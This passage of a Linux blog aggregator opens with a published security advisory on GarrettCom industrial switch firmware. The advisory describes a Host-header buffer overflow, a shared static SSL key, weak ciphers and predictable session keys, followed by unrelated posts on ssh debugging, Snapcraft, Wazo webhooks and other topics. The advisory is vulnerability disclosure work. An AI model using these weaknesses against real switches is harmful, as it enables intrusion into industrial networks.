GarrettCom-03 - Stack Based Buffer Overflow in HTTP Server

Severity: High

When rendering the /gc/flash.php page, the server performs URI encoding of the Host header into a fixed-length buffer on the stack. This encoding appears unbounded and can lead to memory corruption, possibly including remote code execution. Sending garbage data appears to hang the webserver thread after it responds to the current request. Requests with Host headers longer than 220 characters trigger the observed behavior.

GET /gc/flash.php HTTP/1.1
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.28 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, sdch, br
Accept-Language: en-US,en;q=0.8

GarrettCom-04 - SSL Keys Shared Across Devices

Severity: Moderate

The SSL certificate on all devices running firmware version 4.6.0 is the same. This issue was previously reported and an advisory released by ICS-CERT. While GarrettCom reported the issue was fixed in 4.5.6, the web server certificate remains static in 4.6.0:

openssl s_client -connect -showcerts
depth=0 C = US, ST = California, L = Fremont, O = Belden, OU = Technical Support, CN =, emailAddress =
verify error:num=18:self signed certificate
verify return:1
depth=0 C = US, ST = California, L = Fremont, O = Belden, OU = Technical Support, CN =, emailAddress =
verify return:1
Certificate chain
0 s:/C=US/ST=California/L=Fremont/O=Belden/OU=Technical Support/CN=
i:/C=US/ST=California/L=Fremont/O=Belden/OU=Technical Support/CN=

Note that Belden Garrettcom has addressed this issue by reinforcing that users of the switches should install their own SSL certificates if they do not want to use the default certificate and key.

GarrettCom-05 - Weak SSL Ciphers Enabled

Severity: Moderate

Many of the SSL cipher suites offered by the switch are outdated, relying on insecure ciphers or hashes. Additionally, no key exchanges with perfect forward secrecy are offered, so all previous communications are potentially compromised, given the static-key issue reported above. Particularly noteworthy is the use of 56-bit DES, RC4, and MD5-based MACs.

ssl3: AES256-SHA
ssl3: DES-CBC3-SHA
ssl3: AES128-SHA
ssl3: SEED-SHA
ssl3: RC4-SHA
ssl3: RC4-MD5
tls1: AES256-SHA
tls1: DES-CBC3-SHA
tls1: AES128-SHA
tls1: SEED-SHA
tls1: RC4-SHA
tls1: RC4-MD5
tls1_1: AES256-SHA
tls1_1: CAMELLIA256-SHA
tls1_1: DES-CBC3-SHA
tls1_1: AES128-SHA
tls1_1: SEED-SHA
tls1_1: CAMELLIA128-SHA
tls1_1: RC4-SHA
tls1_1: RC4-MD5
tls1_1: DES-CBC-SHA
tls1_2: AES256-GCM-SHA384
tls1_2: AES256-SHA256
tls1_2: AES256-SHA
tls1_2: CAMELLIA256-SHA
tls1_2: DES-CBC3-SHA
tls1_2: AES128-GCM-SHA256
tls1_2: AES128-SHA256
tls1_2: AES128-SHA
tls1_2: SEED-SHA
tls1_2: CAMELLIA128-SHA
tls1_2: RC4-SHA
tls1_2: RC4-MD5
tls1_2: DES-CBC-SHA

GarrettCom-06 - Weak HTTP session key generation

Severity: Moderate

The HTTP session key generation is predictable due to a lack of randomness in the generation process. Each key is generated by hashing the previous hash result together with the current time, at a granularity of roughly 50 time units per second. For the first key, the previous hash is replaced with a fixed salt.

The vulnerability allows an attacker with some knowledge of when a key was generated to predict the first key generated by the switch. It also enables privilege escalation attacks that predict all future keys after observing two consecutive key generations at a lower privilege level.


  • 2017/01/?? - Issues Discovered
  • 2017/01/27 - Reported to
  • 2017/04/27 - 90 day timeline expires, Belden reports patched release forthcoming.
  • 2017/05/08 - Belden releases update & advisory.
  • 2017/05/15 - Disclosure published


These issues were discovered by Andrew Griffiths, David Tomaschik, and Xiaoran Wang of the Google Security Assessments Team.

19 May, 2017 07:00AM

Jono Bacon: Google Home: An Insight Into a 4-Year-Old’s Mind

Recently I got a Google Home (thanks to Google for the kind gift). Last week I recorded a quick video of me interrogating it:

Well, tonight I nipped upstairs quickly to go and grab something and as I came back downstairs I heard Jack, our vivacious 4-year-old asking it questions, seemingly not expecting daddy to be listening.

This is when I discovered the wild curiosity in a 4-year-old’s mind. It included such size and weight questions as…

OK Google, how big is the biggest teddy bear?


OK Google, how much does my foot weigh?

…to curiosities about physics…

OK Google, can chickens fly faster than space rockets?

…to queries about his family…

OK Google, is daddy a mommy?

…and while asking this question he interrupted Google’s denial of an answer with…

OK Google, has daddy eaten a giant football?

Jack then switched gears a little bit, out of likely frustration that Google seemed to “not have an answer for that yet” to all of his questions, and figured the more confusing the question, the more likely that talking thing in the kitchen would work:

OK Google, does a guitar make a hggghghghgghgghggghghg sound?

Google was predictably stumped with the answer. So, in classic Jack fashion, the retort was:

OK Google, banana peel.

While this may seem random, it isn’t:

I would love to see the world through his eyes, it must be glorious.

The post Google Home: An Insight Into a 4-Year-Old’s Mind appeared first on Jono Bacon.

19 May, 2017 03:27AM

Benjamin Mako Hill: Children’s Perspectives on Critical Data Literacies

Last week, we presented a new paper that describes how children are thinking through some of the implications of new forms of data collection and analysis. The presentation was given at the ACM CHI conference in Denver last week and the paper is open access and online.

Over the last couple of years, we’ve worked on a large project to support children in doing — and not just learning about — data science. We built a system, Scratch Community Blocks, that allows the 18 million users of the Scratch online community to write their own computer programs — in Scratch of course — to analyze data about their own learning and social interactions. An example of one of those programs, which finds how many of one’s followers in Scratch are not from the United States, is shown below.

Last year, we deployed Scratch Community Blocks to 2,500 active Scratch users who, over a period of several months, used the system to create more than 1,600 projects.

As children used the system, Samantha Hautea, a student in UW’s Communication Leadership program, led a group of us in an online ethnography. We visited the projects children were creating and sharing. We followed the forums where users discussed the blocks. We read comment threads left on projects. We combined Samantha’s detailed field notes with the text of comments and forum posts, with ethnographic interviews of several users, and with notes from two in-person workshops. We used a technique called grounded theory to analyze these data.

What we found surprised us. We expected children to reflect on being challenged by — and hopefully overcoming — the technical parts of doing data science. Although we certainly saw this happen, what emerged much more strongly from our analysis was detailed discussion among children about the social implications of data collection and analysis.

In our analysis, we grouped children’s comments into five major themes that represented what we called “critical data literacies.” These literacies reflect things that children felt were important implications of social media data collection and analysis.

First, children reflected on the way that programmatic access to data — even data that was technically public — introduced privacy concerns. One user described the ability to analyze data as “creepy”, but at the same time, “very cool.” Children expressed concern that programmatic access to data could lead to “stalking” and suggested that the system should ask for permission.

Second, children recognized that data analysis requires skepticism and interpretation. For example, Scratch Community Blocks introduced a bug where the block that returned data about followers included users with disabled accounts. One user, in an interview described to us how he managed to figure out the inconsistency:

At one point the follower blocks, it said I have slightly more followers than I do. And, that was kind of confusing when I was trying to make the project. […] I pulled up a second [browser] tab and compared the [data from Scratch Community Blocks and the data in my profile].

Third, children discussed the hidden assumptions and decisions that drive the construction of metrics. For example, the number of views received for each project in Scratch is counted using an algorithm that tries to minimize the impact of gaming the system (similar to, for example, Youtube). As children started to build programs with data, they started to uncover and speculate about the decisions behind metrics. For example, they guessed that the view count might only include “unique” views and that view counts may include users who do not have accounts on the website.

Fourth, children building projects with Scratch Community Blocks realized that an algorithm driven by social data may cause certain users to be excluded. For example, a 13-year-old expressed concern that the system could be used to exclude users with few social connections saying:

I love these new Scratch Blocks! However I did notice that they could be used to exclude new Scratchers or Scratchers with not a lot of followers by using a code: like this:
when flag clicked
if then user’s followers < 300
stop all.
I do not think this a big problem as it would be easy to remove this code but I did just want to bring this to your attention in case this not what you would want the blocks to be used for.

Fifth, children were concerned about the possibility that measurement might distort the Scratch community’s values. While giving feedback on the new system, a user expressed concern that by making it easier to measure and compare followers, the system could elevate popularity over creativity, collaboration, and respect as a marker of success in Scratch.

I think this was a great idea! I am just a bit worried that people will make these projects and take it the wrong way, saying that followers are the most important thing in on Scratch.

Kids’ conversations around Scratch Community Blocks are good news for educators who are starting to think about how to engage young learners in thinking critically about the implications of data. Although no kid using Scratch Community Blocks discussed each of the five literacies described above, the themes reflect starting points for educators designing ways to engage kids in thinking critically about data.

Our work shows that if children are given opportunities to actively engage and build with social and behavioral data, they might not only learn how to do data analysis, but also reflect on its implications.

This blog-post and the work that it describes is a collaborative project by Samantha Hautea, Sayamindu Dasgupta, and Benjamin Mako Hill. We have also received support and feedback from members of the Scratch team at MIT (especially Mitch Resnick and Natalie Rusk), as well as from Hal Abelson from MIT CSAIL. Financial support came from the US National Science Foundation.

19 May, 2017 12:51AM

May 18, 2017

Ken VanDine: Ubuntu Desktop - Call for feedback

With the Ubuntu Desktop transitioning from Unity to GNOME, what does that look like in 17.10 and 18.04?  You can learn some more about that by checking out my interview on OMG! Ubuntu!, but more importantly our friends at OMG! Ubuntu! are helping us out by collecting some user feedback on GNOME extensions and defaults.  Please take a few minutes and complete the survey.  Thanks for your input!

18 May, 2017 04:51PM by Ken VanDine

Ubuntu Podcast from the UK LoCo: S10E11 – Flaky Noxious Rainstorm - Ubuntu Podcast

We talk about getting older and refurbishing ZX Spectrums. Ubuntu, Fedora and openSUSE are “apps” in the Windows Store. Android has a new modular base, Fuchsia has a new UI layer, HP laptops come pre-installed with a keylogger, many people WannaCry and Ubuntu start to reveal their plans for the Ubuntu 17.10 desktop.

It’s Season Ten Episode Eleven of the Ubuntu Podcast! Alan Pope, Mark Johnson and Martin Wimpress are connected and speaking to your brain.

In this week’s show:

That’s all for this week! If there’s a topic you’d like us to discuss, or you have any feedback on previous shows, please send your comments and suggestions to or Tweet us or Comment on our Facebook page or comment on our Google+ page or comment on our sub-Reddit.

18 May, 2017 02:00PM

Alessio Treglia: Digital Ipseity: Which Identity?


Within the next three years, more than seven billion people and businesses will be connected to the Internet. During this time of dramatic increases in access to the Internet, networks have seen an interesting proliferation of systems for digital identity management (e.g. SPID in Italy). But what is really meant by “digital identity“? All these systems are implemented in order to have the utmost certainty that the data entered by the subscriber (address, name, birth, telephone, email, etc.) coincides directly with that of the physical person. In other words, the data are certified to be “identical” to those of the user; there is a perfect overlap between the digital page and the authentic user certificate: an “idem“, that is, an identity.

This identity is our personal records reflected on the net, nothing more than that. Obviously, this data needs to be appropriately protected from malicious attacks by means of strict privacy rules, as it contains so-called “sensitive” information, but this data itself is not sufficiently interesting for the commercial market, except for statistical purposes on homogeneous population groups. What may be a real goldmine for the “web company” is another type of information: user’s ipseity. It is important to immediately remove the strong semantic ambiguity that weighs on the notion of identity. There are two distinct meanings…

<Read More…[by Fabio Marzocca]>

18 May, 2017 08:50AM

hackergotchi for Grml developers

Grml developers

Michael Prokop: Debugging a mystery: ssh causing strange exit codes?

XKCD comic 1722

Recently we had a WTF moment at a customer of mine which is worth sharing.

In an automated deployment procedure we’re installing Debian systems and setting up MySQL HA/Scalability. Installation of the first node works fine, but during installation of the second node something weird is going on. Even though the deployment procedure reported that everything went fine: it wasn’t fine at all. After bisecting to the relevant command lines where it’s going wrong we identified that the failure is happening between two ssh/scp commands, which are invoked inside a chroot through a shell wrapper. The ssh command caused a wrong exit code showing up: instead of bailing out with an error (we’re running under ‘set -e‘) it returned with exit code 0 and the deployment procedure continued, even though there was a fatal error. Initially we triggered the bug when two ssh/scp command lines close to each other were executed, but I managed to find a minimal example for demonstration purposes:

# cat ssh_wrapper 
chroot << "EOF" / /bin/bash
ssh root@localhost hostname >/dev/null
exit 1
EOF
echo "return code = $?"

What we’d expect is the following behavior, receive exit code 1 from the last command line in the chroot wrapper:

# ./ssh_wrapper 
return code = 1

But what we actually get is exit code 0:

# ./ssh_wrapper 
return code = 0

Uhm?! So what’s going wrong and what’s the fix? Let’s find out what’s causing the problem:

# cat ssh_wrapper 
chroot << "EOF" / /bin/bash
ssh root@localhost command_does_not_exist >/dev/null 2>&1
exit "$?"
EOF
echo "return code = $?"

# ./ssh_wrapper 
return code = 127

Ok, so if we invoke it with a binary that does not exist we properly get exit code 127, as expected.
What about switching /bin/bash to /bin/sh (which corresponds to dash here) to make sure it’s not a bash bug:

# cat ssh_wrapper 
chroot << "EOF" / /bin/sh
ssh root@localhost hostname >/dev/null
exit 1
EOF
echo "return code = $?"

# ./ssh_wrapper 
return code = 1

Oh, but that works as expected!?

When looking at this behavior I had the feeling that something is going wrong with file descriptors. So what about wrapping the ssh command line within different tools? No luck with `stdbuf -i0 -o0 -e0 ssh root@localhost hostname`, nor with `script -c "ssh root@localhost hostname" /dev/null` and also not with `socat EXEC:"ssh root@localhost hostname" STDIO`. But it works under unbuffer(1) from the expect package:

# cat ssh_wrapper 
chroot << "EOF" / /bin/bash
unbuffer ssh root@localhost hostname >/dev/null
exit 1
EOF
echo "return code = $?"

# ./ssh_wrapper 
return code = 1

So my bet on something with the file descriptor handling was right. Going through the ssh manpage, what about using ssh’s `-n` option to prevent reading from standard input (stdin)?

# cat ssh_wrapper
chroot << "EOF" / /bin/bash
ssh -n root@localhost hostname >/dev/null
exit 1
EOF
echo "return code = $?"

# ./ssh_wrapper 
return code = 1

Bingo! Quoting ssh(1):

     -n      Redirects stdin from /dev/null (actually, prevents reading from stdin).
             This must be used when ssh is run in the background.  A common trick is
             to use this to run X11 programs on a remote machine.  For example,
             ssh -n emacs & will start an emacs on,
             and the X11 connection will be automatically forwarded over an encrypted
             channel.  The ssh program will be put in the background.  (This does not work
             if ssh needs to ask for a password or passphrase; see also the -f option.)

Let’s execute the scripts through `strace -ff -s500 ./ssh_wrapper` to see what’s going in more detail.
In the strace run without ssh’s `-n` option we see that it’s cloning stdin (file descriptor 0), getting assigned to file descriptor 4:

dup(0)            = 4
read(4, "exit 1\n", 16384) = 7

while in the strace run with ssh’s `-n` option being present there’s no file descriptor duplication but only:

open("/dev/null", O_RDONLY) = 4

This matches ssh.c’s ssh_session2_open function (where stdin_null_flag corresponds to ssh’s `-n` option):

        if (stdin_null_flag) {                                            
                in = open(_PATH_DEVNULL, O_RDONLY);
        } else {
                in = dup(STDIN_FILENO);

This behavior can also be simulated if we explicitly read from /dev/null, and this indeed works as well:

# cat ssh_wrapper
chroot << "EOF" / /bin/bash
ssh root@localhost hostname >/dev/null </dev/null
exit 1
EOF
echo "return code = $?"

# ./ssh_wrapper 
return code = 1

The underlying problem is that both bash and ssh are consuming from stdin. This can be verified via:

# cat ssh_wrapper
chroot << "EOF" / /bin/bash
echo "Inner: pre"
while read line; do echo "Eat: $line" ; done
echo "Inner: post"
exit 3
EOF
echo "Outer: exit code = $?"

# ./ssh_wrapper
Inner: pre
Eat: echo "Inner: post"
Eat: exit 3
Outer: exit code = 0

This behavior applies to bash, ksh, mksh, posh and zsh. Only dash doesn’t show this behavior.
To understand the difference between bash and dash executions we can use the following test scripts:

# cat stdin-test-cmp
#!/bin/sh

TEST_SH=bash strace -v -s500 -ff ./stdin-test 2>&1 | tee stdin-test-bash.out
TEST_SH=dash strace -v -s500 -ff ./stdin-test 2>&1 | tee stdin-test-dash.out

# cat stdin-test
#!/bin/sh

: ${TEST_SH:=dash}

$TEST_SH <<EOF
echo "Inner: pre"
while read line; do echo "Eat: \$line"; done
echo "Inner: post"
exit 3
EOF

echo "Outer: exit code = $?"

When executing `./stdin-test-cmp` and comparing the generated files stdin-test-bash.out and stdin-test-dash.out you’ll notice that dash consumes all stdin in one single go (a single `read(0, …)`), instead of character-by-character as specified by POSIX and implemented by bash, ksh, mksh, posh and zsh. See stdin-test-bash.out on the left side and stdin-test-dash.out on the right side in this screenshot:

screenshot of vimdiff on *.out files

So when ssh tries to read from stdin there’s nothing there anymore.

Quoting POSIX’s sh section:

When the shell is using standard input and it invokes a command that also uses standard input, the shell shall ensure that the standard input file pointer points directly after the command it has read when the command begins execution. It shall not read ahead in such a manner that any characters intended to be read by the invoked command are consumed by the shell (whether interpreted by the shell or not) or that characters that are not read by the invoked command are not seen by the shell. When the command expecting to read standard input is started asynchronously by an interactive shell, it is unspecified whether characters are read by the command or interpreted by the shell.

If the standard input to sh is a FIFO or terminal device and is set to non-blocking reads, then sh shall enable blocking reads on standard input. This shall remain in effect when the command completes.

So while we learned that both bash and ssh were consuming from stdin, and that this needs to be prevented by either using ssh’s `-n` option or explicitly redirecting stdin, we also noticed that dash’s behavior is different from all the other main shells and could be considered a bug (which we reported as #862907).
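The difference is easy to reproduce without strace. In this minimal sketch (assuming both bash and dash are installed), a two-line script is fed via stdin and its first command, head(1), also reads stdin:

```shell
# bash reads its script input line by line, so head(1) still finds
# the second line on stdin and prints it:
printf 'head -n1\nsecond line\n' | bash

# dash swallows the whole input in one read(), so head gets nothing,
# and dash then tries to execute "second line" itself as a command:
printf 'head -n1\nsecond line\n' | dash
```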

Lessons learned:

  • Be aware of ssh’s `-n` option when using ssh/scp inside scripts.
  • Feeding shell scripts via stdin is not only error-prone but also very inefficient, as a standards-compliant implementation requires a read(2) system call per byte of input. Instead, write the commands to a temporary script and execute that.
  • When debugging problems make sure to explore different approaches and tools to ensure you’re not relying on a buggy behavior in any involved tool.
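The temporary-script approach from the second lesson can be sketched like this (the commands inside the script are placeholders):

```shell
#!/bin/sh
# Write the commands to a private temporary file instead of feeding
# them to the shell via stdin, then execute that file; stdin is no
# longer shared between the shell and the commands it runs.
tmpscript=$(mktemp) || exit 1
trap 'rm -f "$tmpscript"' EXIT

cat > "$tmpscript" <<'EOS'
echo "running from a temporary script"
exit 1
EOS

sh "$tmpscript"
echo "return code = $?"
```

Because the script is read from a file rather than stdin, a command like ssh inside it can no longer swallow the remaining lines.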

Thanks to Guillem Jover for review and feedback regarding this blog post.

18 May, 2017 07:29AM

hackergotchi for Wazo


Webhook coming in Wazo

For several months we have been working hard to improve Wazo and make it as open as possible. The latest release, 17.07, showcases our recent work and our ongoing developments around Wazo. You will discover: a new web interface built on our REST APIs, a marketplace to extend Wazo easily, and new features such as voice menus, multiple lines per user, and more.

But we still have a few surprises for you over the coming months! With the goal of creating a telephony platform in your image, letting you build a tailor-made system, it became clear that we needed a tool enabling interconnection with a platform that offers more than 700 other interesting products on the market.

So I started working on a connector for a platform called Zapier. If you don't know it, head straight to their website and create an account to try it out; it's free.



Zapier is a cloud platform with hundreds of connectors that let you do three things:

  • A "trigger"
  • An action
  • A "search" (which is also an action)

A trigger is an action at a given point in time. In Wazo's case, for example: fetch my latest call logs. One Zapier peculiarity is that a trigger runs by default every 5 or 15 minutes, depending on your account type. There is of course another kind of trigger, called an "instant trigger", which receives an event instead. Zapier's mechanism for this is called REST hooks, and they have built a website explaining their vision of it.

Once you have chosen your trigger, Zapier lets you turn its result into an action. Zapier applications therefore have to provide an "IN" and an "OUT" mechanism. Sticking with our Wazo example, my "IN" will be a trigger on my call logs, and my "OUT" will be, for example, an action sending the data to a Google Sheets spreadsheet.

It then works as follows: every X minutes, Zapier queries my Wazo; if there are new entries, Zapier sends them to my Google sheet. Simple, isn't it?

So how do you configure it? First, you need an account on the Zapier platform; then simply click "MAKE A ZAP" and choose your "IN" application, i.e. your trigger.


Once that choice is made, simply pick one of the available triggers.


Then create a connection account between Zapier and your Wazo. One important prerequisite: your Wazo must be reachable by Zapier on port 443 so that it can access the Wazo APIs.


Once the connection is established, all that is left is to choose your "OUT" application, i.e. the desired action. From the moment your "ZAP" is created, there is nothing more to do: Zapier and Wazo will work together and automate your export. Of course this is just one example; browse the hundreds of applications and find what interests you most.

It is also interesting to open things up in other directions. This led me to develop a new service in Wazo enabling this kind of integration with many applications. My next example is based on a rising free software project positioning itself as a real alternative to Slack, the real-time communication platform (a more evolved IRC), called Mattermost. There are probably others, but we have been using Mattermost internally for a long time, so it is the one we know best.


If you want more information about Mattermost, I invite you to visit their website directly. We use the community edition and are generally always up to date.


Like Slack, Mattermost lets you create incoming ("IN") and outgoing ("OUT") webhooks, which sounds a bit like Zapier ;). An incoming webhook is simply an HTTP endpoint to which you send a message in JSON format. It is fairly basic, but very simple to put in place.

To do so, go to the Mattermost console, choose "Integrations" and create an incoming webhook. You then pick the channel where you want to receive the messages.


A fairly simple example of the message to post in your request:

{
  "username": "quintana",
  "text": "Salut c'est sylvain"
}

Easy :)
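For reference, such a message can be posted by hand with curl (the webhook URL below is a placeholder for the one generated by your Mattermost instance):

```shell
# Post a JSON message to a Mattermost incoming webhook.
# Replace the URL with the one your Mattermost instance generated.
curl -X POST \
     -H 'Content-Type: application/json' \
     -d '{"username": "quintana", "text": "Salut c'\''est sylvain"}' \
     https://mattermost.example.com/hooks/your-hook-id
```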

Back to Wazo! As always, when we develop something in Wazo, we must provide a REST interface for the feature, which also makes it easy to add a plugin to our new management interface.


In Wazo's case, here is what it will look like.


How does it work? For several years now, we have been publishing an event on our bus (based on RabbitMQ) for everything that happens. This means, for example, that when a call comes in on your phone, an event named "call_created" is sent on the bus.

Here is a concrete example with Mattermost and Wazo: I want a channel to be notified whenever my phone rings. Setting this up boils down to:

  • Creating an incoming webhook in Mattermost targeting a given channel.
  • Retrieving the URL of that webhook.
  • Creating a webhook in Wazo on the "call_created" event that sends the JSON described above to the Mattermost HTTP URL.

Phew, almost there.

To create the webhook in Wazo, you need the Wazo webhook plugin; then press the little plus button to add a new one.


Enter a name, for example "Mattermost call created", then:

  • Event Name: "call_created"
  • Target: "http://mattermost/hook/monhook"
  • Method: "post" (Mattermost hooks are POSTs)
  • Content Type: we will keep JSON
  • Users: choose which users the webhook should fire for.
  • Template: our famous JSON from above.


Templates are based on Jinja templates, so you can pull information from the message into your template using the {{ payload }} syntax, for example {{ payload.user_uuid }}.
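As an illustration, a template along those lines might look like the following (a hypothetical sketch; the exact fields available in payload depend on the event):

```json
{
  "username": "wazo",
  "text": "Incoming call for user {{ payload.user_uuid }}"
}
```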

Once your webhook is set up, just receive or make a call and the information will arrive in real time on your Mattermost channel.

Advanced example:


I hope this information is useful and gives you a better idea of what you will be able to do with Wazo very soon!

Don't hesitate to get in touch and send us your feedback.


18 May, 2017 04:00AM by Sylvain Boily

May 17, 2017

hackergotchi for Ubuntu developers

Ubuntu developers

Ubuntu Insights: Simplenote gives a new life to your notes

There’s a new desktop snap in the Snap store: Simplenote.

Write in Markdown, sync, tag, collaborate and publish

If you haven’t tried it yet, Simplenote brings a solid note-taking utility to your day-to-day open source toolkit. Don’t be fooled by its simple appearance: it’s one of the most comprehensive editing suites around, especially for Markdown, with previews and extensive syntax support.

While its most prominent feature is instant notes syncing across devices (and platforms — Linux, web, Android, Mac, Windows and iOS), Simplenote also comes with a tagging system and collaborative editing. For example, tag a note with someone’s email address to edit it together. If you want to make a note temporarily public, it even gives you the ability to publish notes as standalone webpages in two clicks.

To install Simplenote as a snap:

sudo snap install simplenote

Simple to install, automatically updated

Why does it make sense to have Simplenote packaged as a snap? Snaps mean simple installation and update management with no need to worry about dependencies. It also means that when the software vendors make them available, it’s easier to access the beta version of their app or even daily builds.

How many Linux package formats do Electron developers need?

While the right answer is probably “as many as they need to reach their full potential audience”, snapping Electron applications means building one snap that works on all the major Linux distributions, with support for more distributions growing.

User install documentation can be simplified and your application will be discoverable by millions of Linux users in the Software Center. To ease the building process even more, the snap format is integrated with Electron Builder.

Give all users your greatest release at the same time

Application developers are in complete control of the publishing and release of their software, which drastically simplifies support as they can control the version of the app being consumed. Once a snap is installed, it will automatically be kept up to date, with install metrics available from the snap store. No more having to maintain old versions or asking users to update before reporting bugs.

Get started with snaps at or watch the developer intro video first:

17 May, 2017 08:16PM by Ubuntu Insights

hackergotchi for Maemo developers

Maemo developers

The rules of scuba diving

  • First rule. You must understand the rules of scuba diving. If you don’t know or understand the rules of scuba diving, go to the second rule.
  • The second rule is that you never dive alone.
  • The third rule is that you always keep close enough to each other to perform a rescue of any kind.
  • The fourth rule is that you signal each other and therefore know each other’s signals. Underwater, communication is key.
  • The fifth rule is that you tell the others, for example, when you don’t feel well. The others want to know when you emotionally don’t feel well. Whenever you are insecure, you tell them. This is hard.
  • The sixth rule is that you don’t violate earlier agreed upon rules.
  • The seventh rule is that the agreed-upon rules will be eclipsed the moment any form of panic occurs; you will restore the rules using rationalism first, pragmatism next, but emotional feelings last. No matter what.
  • The eighth rule is that the seventh rule is key to survival.

These rules make scuba diving an excellent learning school for software development project managers.


17 May, 2017 07:41PM by Philip Van Hoof

hackergotchi for Ubuntu developers

Ubuntu developers

Daniel Pocock: Hacking the food chain in Switzerland

A group has recently been formed on Meetup seeking to build a food computer in Zurich. The initial meeting is planned for 6:30pm on 20 June 2017 at ETH (Zurich Centre/Zentrum, Rämistrasse 101).

The question of food security underlies many of the world's problems today. In wealthier nations, we are being called upon to trust a highly opaque supply chain and our choices are limited to those things that major supermarket chains are willing to stock. A huge transport and storage apparatus adds to the cost and CO2 emissions and detracts from the nutritional value of the produce that reaches our plates. In recent times, these problems have been highlighted by the horsemeat scandal, the Guacapocalypse and the British Hummus crisis.

One interesting initiative to create transparency and encourage diversity in our diets is the Open Agriculture (OpenAg) Initiative from MIT, summarised in this TED video from Caleb Harper. The food produced is healthier and fresher than anything you might find in a supermarket and has no exposure to pesticides.

An open source approach to food

An interesting aspect of this project is the promise of an open source approach. The project provides hardware plans, a video of the build process, source code and the promise of sharing climate recipes (scripts) to replicate the climates of different regions, helping ensure it is always the season for your favourite fruit or vegetable.

Do we need it?

Some people have commented on the cost of equipment and electricity. Carsten Agger recently blogged about permaculture as a cleaner alternative. While there are many places where people can take that approach, there are also many overpopulated regions and cities where it is not feasible. Some countries, like Japan, have an enormous population and previously productive farmland contaminated by industry, such as the Fukushima region. Growing our own food also has the potential to reduce food waste, as individual families and communities can grow what they need.

Whether it is essential or not, the food computer project also provides a powerful platform to educate people about food and climate issues and an exciting opportunity to take the free and open source philosophy into many more places in our local communities. The Zurich Meetup group has already received expressions of interest from a diverse group including professionals, researchers, students, hackers, sustainability activists and free software developers.

Next steps

People who want to form a group in their own region can look in the forum topic "Where are you building your Food Computer?" to find out if anybody has already expressed interest.

Which patterns from the free software world can help more people build more food computers? I've already suggested using Debian's live-wrapper to distribute a runnable ISO image that can boot from a USB stick, can you suggest other solutions like this?

Can you think of any free software events where you would like to see a talk or exhibit about this project? Please suggest them on the OpenAg forum.

There are many interesting resources about the food crisis, an interesting starting point is watching the documentary Food, Inc.

If you are in Switzerland, please consider attending the meeting on at 6:30pm on 20 June 2017 at ETH (Centre/Zentrum), Zurich.

One final thing to contemplate: if you are not hacking your own food supply, who is?

17 May, 2017 06:41PM

Timo Aaltonen: Mesa 17.1.0 for Ubuntu 16.04 & 17.04

The X-Updates PPA has the latest Mesa release for xenial and zesty, go grab it while it’s hot!

On a related note, Mesa 17.0.6 got accepted to zesty-proposed, so give that a spin too if you’re running zesty and report “yay!”/”eww..” on the SRU bug.

17 May, 2017 04:20PM

Alan Pope: Building Apps for Linux without Linux

It's now super easy to build Linux software packages on your Windows laptop. No VM required, no need for remote Linux hosts.

I spend a lot of my day talking to developers about their Linux software packaging woes. Many of them are using Linux desktops as their primary development platform. Some aren't, and that's their (or their employers) choice. For those developers who run Windows and want to target Linux for their applications, things just got a bit easier.

Snapcraft now runs on Windows, via Bash on Windows (a.k.a Windows Subsystem for Linux).

Snapcraft on Windows

Microsoft updated their Windows Subsystem for Linux to include Ubuntu 16.04.2 LTS as the default image. When WSL first launched a year ago, it shipped 14.04 to early adopters and developers.

Snapcraft is available in the Ubuntu 16.04 repositories, so is install-able inside WSL. So developers on Windows can easily run Snapcraft to package their software as snaps, and push to the store. No need for virtual machines, or separate remote hosts running Linux.

I made a quick video about it here. Please share it with your Windows-using developer friends :)

If you already have WSL setup with Ubuntu 14.04 the easiest way to move to 16.04.2 is to delete the install and start again. This will remove the installed packages and data in your WSL setup, so backup first. Open a command prompt window in Windows and run:-

lxrun /uninstall

To re-install, which will pull down Ubuntu 16.04.2 LTS:-

lxrun /install

Re-installing Ubuntu

Once you've got Ubuntu 16.04.2 LTS in WSL, launch it from the start menu then install snapcraft from the Ubuntu repositories with:-

sudo apt install snapcraft

Once that's done, you can either launch snapcraft within Bash on Windows, or directly from a Window command prompt shell with bash -c snapcraft. Here's a video showing me building the Linux version of storjshare using this configuration on my Windows 10 desktop from a standard command prompt window. I sped the video up because nobody wants to watch 8 minutes of shell scrolling by in realtime. Also, my desktop is quite slow. :)
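If you have not seen one before, a snap is described by a snapcraft.yaml file at the top of the project. A minimal hypothetical sketch (the name, version and source URL are placeholders; pick the plugin matching your build system):

```yaml
name: my-app
version: '0.1'
summary: Example application packaged as a snap
description: |
  A short description of the application.

parts:
  my-app:
    # The plugin drives the build; snapcraft ships plugins for many
    # ecosystems (python, nodejs, cmake, autotools, ...).
    plugin: nodejs
    source: https://github.com/example/my-app.git
```

Running `snapcraft` in the directory containing this file produces the .snap package.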

You can find out more about snapcraft from our documentation, tutorials, and the videos. We also have a forum where we'd love to hear about your experience with snapcraft.

17 May, 2017 02:00PM

Ubuntu Insights: Ubuntu ranked as 2nd most used IoT OS by Eclipse Foundation survey

Last week we posted a blog on programming languages following the Eclipse Foundation 2017 IoT survey results. This week we look at the findings from a business perspective which highlight a number of IoT trends emerging from the wide ranging survey from key industries, growth of new technologies, most common concerns and more. The 2017 results garnered a total of 713 respondents, from all over the world, providing their views on how they are building and using IoT solutions today.

When it comes to building IoT solutions, Linux continues to be the main operating system for both IoT gateways (66.9%) and on constrained devices (44.1%). Taking both these into account, Ubuntu and Ubuntu Core are being used by 44% of those using Linux and far ahead of many alternative operating systems. Designed especially for IoT applications, and trusted by chipset vendors to device makers and system integrators, it’s encouraging to see such a high adoption rate for Ubuntu Core. Those that weren’t using Linux as their chosen OS for IoT were in fact most likely to be using a bare metal solution instead.

More positives for the open source world: 46.1% of organisations use open source in their IoT solutions, with a further 49.1% having either experimented with it or been a committer on such a project for building IoT solutions. This demonstrates that open source within the embedded space is not feared and is seen as the best way to deliver projects, especially when fast development times are expected.

Looking at the broader topics the survey covered, the top 5 IoT industries saw significant growth in three areas in particular: smart cities, energy management and industrial automation. Although home automation and IoT platforms remained in the top 5 just as they did in 2016, this provides further evidence that IoT is spreading across verticals, with an increasing number of sectors looking to integrate and benefit from it.

